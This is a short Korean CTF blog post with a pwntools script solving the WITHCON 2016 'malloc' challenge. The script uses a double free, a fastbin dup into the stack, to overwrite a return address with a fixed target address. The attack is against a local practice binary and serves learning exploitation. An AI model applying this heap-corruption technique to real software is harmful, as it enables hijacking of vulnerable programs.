[WITHCON 2016] malloc

728x90

fastbin dup into stack으로 쓱싹!!!

from pwn import *

s = process("./malloc")
elf = ELF("./malloc")



def malloc(size,content):
        s.recvuntil("> ")
        s.sendline("1")
    s.recvuntil("Enter size :")
    s.sendline(str(size))
    s.recvuntil("Enter data : ")
    s.sendline(content)


def free(index):
        s.recvuntil("> ")
        s.sendline("2")
    s.recvuntil("free :")
    s.sendline(str(index))
    


def list():
        s.recvuntil("> ")
        s.sendline("3")

def modify(index,content):
    s.recvuntil("> ")
        s.sendline("4")
    s.recvuntil("modify : ")
    s.sendline(str(index))
    s.recvuntil("data : ")
    s.sendline(content)
    

def quit():
    s.recvuntil("> ")
    s.sendline("5")

gdb.attach(s)


s.recvuntil("Stack Address : ")
stack = int(s.recv(14),16)
print "stack : " + hex(stack)

malloc(32,"A"*8)
malloc(32,"B"*8)
free(1)
free(2)
free(1)

modify(1,p64(stack-0x58))
malloc(32,"C"*8)
malloc(49,"A"*24+p64(0x0000000000400986))
s.interactive()

저작자표시 비영리 변경금지

'PWN > CTF' 카테고리의 다른 글

[HITCON 2016] house_of_orange (0)	2019.08.13
[WITHCON 2016] normal malloc (0)	2019.02.26
[Hackingcamp 19] ucanfind (0)	2019.02.20
[Hackingcamp 19] guess (0)	2019.02.20
[Hackingcamp 19] Orange (0)	2019.02.20

JIWON J1W0N

[WITHCON 2016] malloc

PWN/CTF 2019. 2. 26. 17:06

티스토리툴바